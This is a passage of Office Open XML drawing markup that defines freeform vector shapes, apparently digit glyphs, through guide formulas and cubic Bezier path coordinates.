                <a:gd name="T17" fmla="*/ 71 h 316"/>
                <a:gd name="T18" fmla="*/ 148 w 218"/>
                <a:gd name="T19" fmla="*/ 114 h 316"/>
                <a:gd name="T20" fmla="*/ 102 w 218"/>
                <a:gd name="T21" fmla="*/ 129 h 316"/>
                <a:gd name="T22" fmla="*/ 66 w 218"/>
                <a:gd name="T23" fmla="*/ 146 h 316"/>
                <a:gd name="T24" fmla="*/ 86 w 218"/>
                <a:gd name="T25" fmla="*/ 161 h 316"/>
                <a:gd name="T26" fmla="*/ 109 w 218"/>
                <a:gd name="T27" fmla="*/ 161 h 316"/>
                <a:gd name="T28" fmla="*/ 183 w 218"/>
                <a:gd name="T29" fmla="*/ 224 h 316"/>
                <a:gd name="T30" fmla="*/ 110 w 218"/>
                <a:gd name="T31" fmla="*/ 285 h 316"/>
                <a:gd name="T32" fmla="*/ 39 w 218"/>
                <a:gd name="T33" fmla="*/ 257 h 316"/>
                <a:gd name="T34" fmla="*/ 45 w 218"/>
                <a:gd name="T35" fmla="*/ 241 h 316"/>
                <a:gd name="T36" fmla="*/ 23 w 218"/>
                <a:gd name="T37" fmla="*/ 219 h 316"/>
                <a:gd name="T38" fmla="*/ 0 w 218"/>
                <a:gd name="T39" fmla="*/ 243 h 316"/>
                <a:gd name="T40" fmla="*/ 110 w 218"/>
                <a:gd name="T41" fmla="*/ 316 h 316"/>
                <a:gd name="T42" fmla="*/ 218 w 218"/>
                <a:gd name="T43" fmla="*/ 224 h 316"/>
                <a:gd name="T44" fmla="*/ 161 w 218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4"/>
                    <a:pt x="167" y="0"/>
                    <a:pt x="110" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="50" y="0"/>
                    <a:pt x="15" y="24"/>
                    <a:pt x="15" y="59"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="15" y="75"/>
                    <a:pt x="27" y="82"/>
                    <a:pt x="37" y="82"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="48" y="82"/>
                    <a:pt x="59" y="73"/>
                    <a:pt x="59" y="60"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="59" y="53"/>
                    <a:pt x="56" y="48"/>
                    <a:pt x="55" y="46"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="70" y="31"/>
                    <a:pt x="106" y="31"/>
                    <a:pt x="110" y="31"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="144" y="31"/>
                    <a:pt x="169" y="49"/>
                    <a:pt x="169" y="71"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="169" y="86"/>
                    <a:pt x="161" y="103"/>
                    <a:pt x="148" y="114"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="132" y="127"/>
                    <a:pt x="120" y="128"/>
                    <a:pt x="102" y="129"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="73" y="131"/>
                    <a:pt x="66" y="131"/>
                    <a:pt x="66" y="146"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="66" y="161"/>
                    <a:pt x="78" y="161"/>
                    <a:pt x="86" y="161"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="109" y="161"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="158" y="161"/>
                    <a:pt x="183" y="195"/>
                    <a:pt x="183" y="224"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="183" y="254"/>
                    <a:pt x="155" y="285"/>
                    <a:pt x="110" y="285"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="90" y="285"/>
                    <a:pt x="52" y="280"/>
                    <a:pt x="39" y="257"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="41" y="254"/>
                    <a:pt x="45" y="251"/>
                    <a:pt x="45" y="241"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="45" y="229"/>
                    <a:pt x="35" y="219"/>
                    <a:pt x="23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9" y="316"/>
                    <a:pt x="110" y="316"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="175" y="316"/>
                    <a:pt x="218" y="270"/>
                    <a:pt x="218" y="224"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="218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" name="Freeform 230">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BFD23931-E8D9-49B7-9AA5-5ED238003863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353051" y="3268663"/>
              <a:ext cx="76200" cy="122238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3 w 197"/>
                <a:gd name="T13" fmla="*/ 30 h 307"/>
                <a:gd name="T14" fmla="*/ 175 w 197"/>
                <a:gd name="T15" fmla="*/ 52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0 w 197"/>
                <a:gd name="T27" fmla="*/ 108 h 307"/>
                <a:gd name="T28" fmla="*/ 20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0 w 197"/>
                <a:gd name="T35" fmla="*/ 277 h 307"/>
                <a:gd name="T36" fmla="*/ 0 w 197"/>
                <a:gd name="T37" fmla="*/ 292 h 307"/>
                <a:gd name="T38" fmla="*/ 20 w 197"/>
                <a:gd name="T39" fmla="*/ 307 h 307"/>
                <a:gd name="T40" fmla="*/ 155 w 197"/>
                <a:gd name="T41" fmla="*/ 307 h 307"/>
                <a:gd name="T42" fmla="*/ 176 w 197"/>
                <a:gd name="T43" fmla="*/ 292 h 307"/>
                <a:gd name="T44" fmla="*/ 155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0" y="92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0" y="307"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="155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" name="Freeform 231">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{76987134-74EB-4351-8F74-8B2CF3B9573C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5483226" y="3365500"/>
              <a:ext cx="23813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" name="Freeform 232">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{416CCE01-2202-4DCF-AEB3-3BD618B9ABA2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565776" y="3267075"/>
              <a:ext cx="63500" cy="123825"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 103 w 168"/>
                <a:gd name="T1" fmla="*/ 21 h 310"/>
                <a:gd name="T2" fmla="*/ 88 w 168"/>
                <a:gd name="T3" fmla="*/ 0 h 310"/>
                <a:gd name="T4" fmla="*/ 73 w 168"/>
                <a:gd name="T5" fmla="*/ 12 h 310"/>
                <a:gd name="T6" fmla="*/ 19 w 168"/>
                <a:gd name="T7" fmla="*/ 61 h 310"/>
                <a:gd name="T8" fmla="*/ 0 w 168"/>
                <a:gd name="T9" fmla="*/ 76 h 310"/>
                <a:gd name="T10" fmla="*/ 17 w 168"/>
                <a:gd name="T11" fmla="*/ 91 h 310"/>
                <a:gd name="T12" fmla="*/ 69 w 168"/>
                <a:gd name="T13" fmla="*/ 69 h 310"/>
                <a:gd name="T14" fmla="*/ 69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3 w 168"/>
                <a:gd name="T29" fmla="*/ 280 h 310"/>
                <a:gd name="T30" fmla="*/ 103 w 168"/>
                <a:gd name="T31" fmla="*/ 2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1"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="103" y="13"/>
                    <a:pt x="103" y="0"/>
                    <a:pt x="88" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="79" y="0"/>
                    <a:pt x="76" y="6"/>
                    <a:pt x="73" y="12"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="54" y="55"/>
                    <a:pt x="28" y="60"/>
                    <a:pt x="19" y="61"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="11" y="62"/>
                    <a:pt x="0" y="63"/>
                    <a:pt x="0" y="76"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="89"/>
                    <a:pt x="9" y="91"/>
                    <a:pt x="17" y="91"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="26" y="91"/>
                    <a:pt x="47" y="88"/>
                    <a:pt x="69" y="69"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="69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6" y="310"/>
                    <a:pt x="23" y="310"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="148" y="310"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="156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3" y="280"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="103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1" name="Freeform 233">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CE15CDA8-8D74-4197-9015-F3F3BB1B05E9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665789" y="3267075"/>
              <a:ext cx="65088" cy="123825"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 103 w 168"/>
                <a:gd name="T1" fmla="*/ 21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1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3 w 168"/>
                <a:gd name="T29" fmla="*/ 280 h 310"/>
                <a:gd name="T30" fmla="*/ 103 w 168"/>
                <a:gd name="T31" fmla="*/ 2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1"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="103" y="13"/>
                    <a:pt x="103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5"/>
                    <a:pt x="28" y="60"/>
                    <a:pt x="18" y="61"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="10" y="62"/>
                    <a:pt x="0" y="63"/>
                    <a:pt x="0" y="76"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="89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5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3" y="280"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="103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2" name="Freeform 234">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9A605673-84F6-4070-B492-F3E044231665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756276" y="3267075"/>
              <a:ext cx="79375" cy="123825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7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6 w 209"/>
                <a:gd name="T33" fmla="*/ 31 h 310"/>
                <a:gd name="T34" fmla="*/ 175 w 209"/>
                <a:gd name="T35" fmla="*/ 97 h 310"/>
                <a:gd name="T36" fmla="*/ 118 w 209"/>
                <a:gd name="T37" fmla="*/ 189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6" y="255"/>
                    <a:pt x="134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8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5" y="46"/>
                    <a:pt x="68" y="31"/>
                    <a:pt x="96" y="31"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="137" y="31"/>
                    <a:pt x="175" y="54"/>
                    <a:pt x="175" y="97"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="175" y="132"/>
                    <a:pt x="151" y="161"/>
                    <a:pt x="118" y="189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3" name="Freeform 235">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FC9416BD-73CF-4AAB-8B09-E638EE5352C7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856289" y="3267075"/>
              <a:ext cx="80963" cy="123825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7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5 w 209"/>
                <a:gd name="T33" fmla="*/ 31 h 310"/>
                <a:gd name="T34" fmla="*/ 175 w 209"/>
                <a:gd name="T35" fmla="*/ 97 h 310"/>
                <a:gd name="T36" fmla="*/ 117 w 209"/>
                <a:gd name="T37" fmla="*/ 189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5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5" y="255"/>
                    <a:pt x="133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8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3" y="107"/>
                    <a:pt x="22" y="107"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="32" y="107"/>
                    <a:pt x="44" y="99"/>
                    <a:pt x="44" y="85"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="44" y="79"/>
                    <a:pt x="41" y="72"/>
                    <a:pt x="37" y="69"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="44" y="46"/>
                    <a:pt x="68" y="31"/>
                    <a:pt x="95" y="31"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="136" y="31"/>
                    <a:pt x="175" y="54"/>
                    <a:pt x="175" y="97"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="175" y="132"/>
                    <a:pt x="150" y="161"/>
                    <a:pt x="117" y="189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4" name="Freeform 236">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BA357C18-858F-4FC4-8807-A05A20B01AB7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954714" y="3267075"/>
              <a:ext cx="84138" cy="125413"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 161 w 217"/>
                <a:gd name="T1" fmla="*/ 144 h 316"/>
                <a:gd name="T2" fmla="*/ 203 w 217"/>
                <a:gd name="T3" fmla="*/ 70 h 316"/>
                <a:gd name="T4" fmla="*/ 109 w 217"/>
                <a:gd name="T5" fmla="*/ 0 h 316"/>
                <a:gd name="T6" fmla="*/ 14 w 217"/>
                <a:gd name="T7" fmla="*/ 59 h 316"/>
                <a:gd name="T8" fmla="*/ 37 w 217"/>
                <a:gd name="T9" fmla="*/ 82 h 316"/>
                <a:gd name="T10" fmla="*/ 59 w 217"/>
                <a:gd name="T11" fmla="*/ 60 h 316"/>
                <a:gd name="T12" fmla="*/ 54 w 217"/>
                <a:gd name="T13" fmla="*/ 46 h 316"/>
                <a:gd name="T14" fmla="*/ 110 w 217"/>
                <a:gd name="T15" fmla="*/ 31 h 316"/>
                <a:gd name="T16" fmla="*/ 169 w 217"/>
                <a:gd name="T17" fmla="*/ 71 h 316"/>
                <a:gd name="T18" fmla="*/ 148 w 217"/>
                <a:gd name="T19" fmla="*/ 114 h 316"/>
                <a:gd name="T20" fmla="*/ 101 w 217"/>
                <a:gd name="T21" fmla="*/ 129 h 316"/>
                <a:gd name="T22" fmla="*/ 65 w 217"/>
                <a:gd name="T23" fmla="*/ 146 h 316"/>
                <a:gd name="T24" fmla="*/ 85 w 217"/>
                <a:gd name="T25" fmla="*/ 161 h 316"/>
                <a:gd name="T26" fmla="*/ 108 w 217"/>
                <a:gd name="T27" fmla="*/ 161 h 316"/>
                <a:gd name="T28" fmla="*/ 183 w 217"/>
                <a:gd name="T29" fmla="*/ 224 h 316"/>
                <a:gd name="T30" fmla="*/ 110 w 217"/>
                <a:gd name="T31" fmla="*/ 285 h 316"/>
                <a:gd name="T32" fmla="*/ 38 w 217"/>
                <a:gd name="T33" fmla="*/ 257 h 316"/>
                <a:gd name="T34" fmla="*/ 44 w 217"/>
                <a:gd name="T35" fmla="*/ 241 h 316"/>
                <a:gd name="T36" fmla="*/ 22 w 217"/>
                <a:gd name="T37" fmla="*/ 219 h 316"/>
                <a:gd name="T38" fmla="*/ 0 w 217"/>
                <a:gd name="T39" fmla="*/ 243 h 316"/>
                <a:gd name="T40" fmla="*/ 110 w 217"/>
                <a:gd name="T41" fmla="*/ 316 h 316"/>
                <a:gd name="T42" fmla="*/ 217 w 217"/>
                <a:gd name="T43" fmla="*/ 224 h 316"/>
                <a:gd name="T44" fmla="*/ 161 w 217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4"/>
                    <a:pt x="167" y="0"/>
                    <a:pt x="109" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="49" y="0"/>
                    <a:pt x="14" y="24"/>
                    <a:pt x="14" y="59"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="14" y="75"/>
                    <a:pt x="27" y="82"/>
                    <a:pt x="37" y="82"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="47" y="82"/>
                    <a:pt x="59" y="73"/>
                    <a:pt x="59" y="60"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="59" y="53"/>
                    <a:pt x="56" y="48"/>
                    <a:pt x="54" y="46"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="70" y="31"/>
                    <a:pt x="105" y="31"/>
                    <a:pt x="110" y="31"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="144" y="31"/>
                    <a:pt x="169" y="49"/>
                    <a:pt x="169" y="71"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="169" y="86"/>
                    <a:pt x="161" y="103"/>
                    <a:pt x="148" y="114"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="132" y="127"/>
                    <a:pt x="119" y="128"/>
                    <a:pt x="101" y="129"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="73" y="131"/>
                    <a:pt x="65" y="131"/>
                    <a:pt x="65" y="146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8" y="161"/>
                    <a:pt x="183" y="195"/>
                    <a:pt x="183" y="224"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="183" y="254"/>
                    <a:pt x="155" y="285"/>
                    <a:pt x="110" y="285"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="90" y="285"/>
                    <a:pt x="51" y="280"/>
                    <a:pt x="38" y="257"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="41" y="254"/>
                    <a:pt x="44" y="251"/>
                    <a:pt x="44" y="241"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="44" y="229"/>
                    <a:pt x="35" y="219"/>
                    <a:pt x="22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8" y="316"/>
                    <a:pt x="110" y="316"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="175" y="316"/>
                    <a:pt x="217" y="270"/>
                    <a:pt x="217" y="224"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="217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5" name="Freeform 237">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{17FED4BD-8D12-4BA0-B934-0CDD6C1177F6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6056314" y="3267075"/>
              <a:ext cx="82550" cy="125413"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 161 w 217"/>
                <a:gd name="T1" fmla="*/ 144 h 316"/>
                <a:gd name="T2" fmla="*/ 203 w 217"/>
                <a:gd name="T3" fmla="*/ 70 h 316"/>
                <a:gd name="T4" fmla="*/ 109 w 217"/>
                <a:gd name="T5" fmla="*/ 0 h 316"/>
                <a:gd name="T6" fmla="*/ 14 w 217"/>
                <a:gd name="T7" fmla="*/ 59 h 316"/>
                <a:gd name="T8" fmla="*/ 36 w 217"/>
                <a:gd name="T9" fmla="*/ 82 h 316"/>
                <a:gd name="T10" fmla="*/ 58 w 217"/>
                <a:gd name="T11" fmla="*/ 60 h 316"/>
                <a:gd name="T12" fmla="*/ 54 w 217"/>
                <a:gd name="T13" fmla="*/ 46 h 316"/>
                <a:gd name="T14" fmla="*/ 109 w 217"/>
                <a:gd name="T15" fmla="*/ 31 h 316"/>
                <a:gd name="T16" fmla="*/ 168 w 217"/>
                <a:gd name="T17" fmla="*/ 71 h 316"/>
                <a:gd name="T18" fmla="*/ 147 w 217"/>
                <a:gd name="T19" fmla="*/ 114 h 316"/>
                <a:gd name="T20" fmla="*/ 101 w 217"/>
                <a:gd name="T21" fmla="*/ 129 h 316"/>
                <a:gd name="T22" fmla="*/ 65 w 217"/>
                <a:gd name="T23" fmla="*/ 146 h 316"/>
                <a:gd name="T24" fmla="*/ 85 w 217"/>
                <a:gd name="T25" fmla="*/ 161 h 316"/>
                <a:gd name="T26" fmla="*/ 108 w 217"/>
                <a:gd name="T27" fmla="*/ 161 h 316"/>
                <a:gd name="T28" fmla="*/ 183 w 217"/>
                <a:gd name="T29" fmla="*/ 224 h 316"/>
                <a:gd name="T30" fmla="*/ 109 w 217"/>
                <a:gd name="T31" fmla="*/ 285 h 316"/>
                <a:gd name="T32" fmla="*/ 38 w 217"/>
                <a:gd name="T33" fmla="*/ 257 h 316"/>
                <a:gd name="T34" fmla="*/ 44 w 217"/>
                <a:gd name="T35" fmla="*/ 241 h 316"/>
                <a:gd name="T36" fmla="*/ 22 w 217"/>
                <a:gd name="T37" fmla="*/ 219 h 316"/>
                <a:gd name="T38" fmla="*/ 0 w 217"/>
                <a:gd name="T39" fmla="*/ 243 h 316"/>
                <a:gd name="T40" fmla="*/ 109 w 217"/>
                <a:gd name="T41" fmla="*/ 316 h 316"/>
                <a:gd name="T42" fmla="*/ 217 w 217"/>
                <a:gd name="T43" fmla="*/ 224 h 316"/>
                <a:gd name="T44" fmla="*/ 161 w 217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4"/>
                    <a:pt x="166" y="0"/>
                    <a:pt x="109" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="49" y="0"/>
                    <a:pt x="14" y="24"/>
                    <a:pt x="14" y="59"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="14" y="75"/>
                    <a:pt x="26" y="82"/>
                    <a:pt x="36" y="82"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="47" y="82"/>
                    <a:pt x="58" y="73"/>
                    <a:pt x="58" y="60"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="58" y="53"/>
                    <a:pt x="55" y="48"/>
                    <a:pt x="54" y="46"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="69" y="31"/>
                    <a:pt x="105" y="31"/>
                    <a:pt x="109" y="31"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="143" y="31"/>
                    <a:pt x="168" y="49"/>
                    <a:pt x="168" y="71"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="168" y="86"/>
                    <a:pt x="161" y="103"/>
                    <a:pt x="147" y="114"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="131" y="127"/>
                    <a:pt x="119" y="128"/>
                    <a:pt x="101" y="129"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="72" y="131"/>
                    <a:pt x="65" y="131"/>
                    <a:pt x="65" y="146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7" y="161"/>
                    <a:pt x="183" y="195"/>
                    <a:pt x="183" y="224"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="183" y="254"/>
                    <a:pt x="155" y="285"/>
                    <a:pt x="109" y="285"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="89" y="285"/>
                    <a:pt x="51" y="280"/>
                    <a:pt x="38" y="257"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="40" y="254"/>
                    <a:pt x="44" y="251"/>
                    <a:pt x="44" y="241"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="44" y="229"/>
                    <a:pt x="34" y="219"/>
                    <a:pt x="22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8" y="316"/>
                    <a:pt x="109" y="316"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="175" y="316"/>
                    <a:pt x="217" y="270"/>
                    <a:pt x="217" y="224"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="217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6" name="Freeform 238">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9B2654C4-B5F7-44CF-888C-11F0E8C63216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6153151" y="3267075"/>
              <a:ext cx="88900" cy="123825"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 4 w 232"/>
                <a:gd name="T1" fmla="*/ 189 h 310"/>
                <a:gd name="T2" fmla="*/ 0 w 232"/>
                <a:gd name="T3" fmla="*/ 206 h 310"/>
                <a:gd name="T4" fmla="*/ 20 w 232"/>
                <a:gd name="T5" fmla="*/ 226 h 310"/>
                <a:gd name="T6" fmla="*/ 145 w 232"/>
                <a:gd name="T7" fmla="*/ 226 h 310"/>
                <a:gd name="T8" fmla="*/ 145 w 232"/>
                <a:gd name="T9" fmla="*/ 280 h 310"/>
                <a:gd name="T10" fmla="*/ 114 w 232"/>
                <a:gd name="T11" fmla="*/ 280 h 310"/>
                <a:gd name="T12" fmla="*/ 94 w 232"/>
                <a:gd name="T13" fmla="*/ 295 h 310"/>
                <a:gd name="T14" fmla="*/ 114 w 232"/>
                <a:gd name="T15" fmla="*/ 310 h 310"/>
                <a:gd name="T16" fmla="*/ 204 w 232"/>
                <a:gd name="T17" fmla="*/ 310 h 310"/>
                <a:gd name="T18" fmla="*/ 224 w 232"/>
                <a:gd name="T19" fmla="*/ 295 h 310"/>
                <a:gd name="T20" fmla="*/ 204 w 232"/>
                <a:gd name="T21" fmla="*/ 280 h 310"/>
                <a:gd name="T22" fmla="*/ 173 w 232"/>
                <a:gd name="T23" fmla="*/ 280 h 310"/>
                <a:gd name="T24" fmla="*/ 173 w 232"/>
                <a:gd name="T25" fmla="*/ 226 h 310"/>
                <a:gd name="T26" fmla="*/ 212 w 232"/>
                <a:gd name="T27" fmla="*/ 226 h 310"/>
                <a:gd name="T28" fmla="*/ 232 w 232"/>
                <a:gd name="T29" fmla="*/ 211 h 310"/>
                <a:gd name="T30" fmla="*/ 212 w 232"/>
                <a:gd name="T31" fmla="*/ 196 h 310"/>
                <a:gd name="T32" fmla="*/ 173 w 232"/>
                <a:gd name="T33" fmla="*/ 196 h 310"/>
                <a:gd name="T34" fmla="*/ 173 w 232"/>
                <a:gd name="T35" fmla="*/ 20 h 310"/>
                <a:gd name="T36" fmla="*/ 153 w 232"/>
                <a:gd name="T37" fmla="*/ 0 h 310"/>
                <a:gd name="T38" fmla="*/ 139 w 232"/>
                <a:gd name="T39" fmla="*/ 0 h 310"/>
                <a:gd name="T40" fmla="*/ 118 w 232"/>
                <a:gd name="T41" fmla="*/ 10 h 310"/>
                <a:gd name="T42" fmla="*/ 4 w 232"/>
                <a:gd name="T43" fmla="*/ 189 h 310"/>
                <a:gd name="T44" fmla="*/ 35 w 232"/>
                <a:gd name="T45" fmla="*/ 196 h 310"/>
                <a:gd name="T46" fmla="*/ 145 w 232"/>
                <a:gd name="T47" fmla="*/ 22 h 310"/>
                <a:gd name="T48" fmla="*/ 145 w 232"/>
                <a:gd name="T49" fmla="*/ 196 h 310"/>
                <a:gd name="T50" fmla="*/ 35 w 232"/>
                <a:gd name="T51" fmla="*/ 19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310">
                  <a:moveTo>
                    <a:pt x="4" y="189"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="195"/>
                    <a:pt x="0" y="196"/>
                    <a:pt x="0" y="206"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="223"/>
                    <a:pt x="4" y="226"/>
                    <a:pt x="20" y="226"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="145" y="226"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="145" y="280"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="114" y="280"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="106" y="280"/>
                    <a:pt x="94" y="280"/>
                    <a:pt x="94" y="295"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="94" y="310"/>
                    <a:pt x="107" y="310"/>
                    <a:pt x="114" y="310"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="204" y="310"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="212" y="310"/>
                    <a:pt x="224" y="310"/>
                    <a:pt x="224" y="295"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="224" y="280"/>
                    <a:pt x="212" y="280"/>
                    <a:pt x="204" y="280"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="173" y="280"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="173" y="226"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="212" y="226"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="220" y="226"/>
                    <a:pt x="232" y="226"/>
                    <a:pt x="232" y="211"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="232" y="196"/>
                    <a:pt x="220" y="196"/>
                    <a:pt x="212" y="196"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="173" y="196"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="173" y="20"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="173" y="4"/>
                    <a:pt x="170" y="0"/>
                    <a:pt x="153" y="0"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="139" y="0"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="127" y="0"/>
                    <a:pt x="124" y="0"/>
                    <a:pt x="118" y="10"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="4" y="189"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="35" y="196"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="145" y="22"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="145" y="196"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="35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7" name="Freeform 239">
              <a:extLst>
